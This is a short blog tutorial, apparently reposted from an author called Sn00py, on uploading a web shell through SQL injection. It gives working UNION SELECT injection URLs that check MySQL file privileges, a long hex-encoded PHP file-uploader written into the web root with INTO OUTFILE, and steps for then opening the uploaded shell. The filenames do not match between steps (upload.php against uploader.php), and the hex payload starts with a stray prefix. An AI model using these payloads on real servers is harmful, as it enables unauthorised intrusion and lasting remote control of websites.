» » Uploading Shell Using Sqli

Uploading Shell Using Sqli

Uploading Shell Using Sqli

SQLi is a fun thing I thought, cause we can do something cool, like we can make some pop up alert, or using HTML code, and we can make phising concept inside SQL Injection. Thats awesome right? For this time I wanna share about "Uploading Shell Using SQL Injection", all you need is:

  • Your must have write privileges and a writable directory (where you have to upload your shell)
  • Root Path (i.e /var/www/website/ or C:\xampp\blablabla....)
  • Magic Qoutes must be enable
Let's check write permissions?
How to check it?
group_concat(user,0x203a20,file_priv) from mysql.user
So our query will be like this
http://localhost/sqli/vuln.php?id=-1 union select group_concat(user,0x203a20,file_priv) from mysql.user-- -
If say Y after current user, we have an access. Next step is lets write uor uploader using INTO OUTFILE syntax
'our script in here' INTO OUTFILE "filepath"
You can see uploader in here "Uploader"..and then you can conver it into hexa
http://localhost/sqli/vuln.php?id=-1 union select 0x92020202020203c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e INTO OUTFILE "C://xampp//htdocs//sqli//upload.php"
And then open it
http://localhost/sqli/uploader.php
and we can see our uploader
 Upload your shell..
And open your shell
http://localhost/sqli/shell.php
And congratulations shell was uploaded

Thanks for reading

Sumber : Sn00py
Diposting Oleh: Unknown

Related Post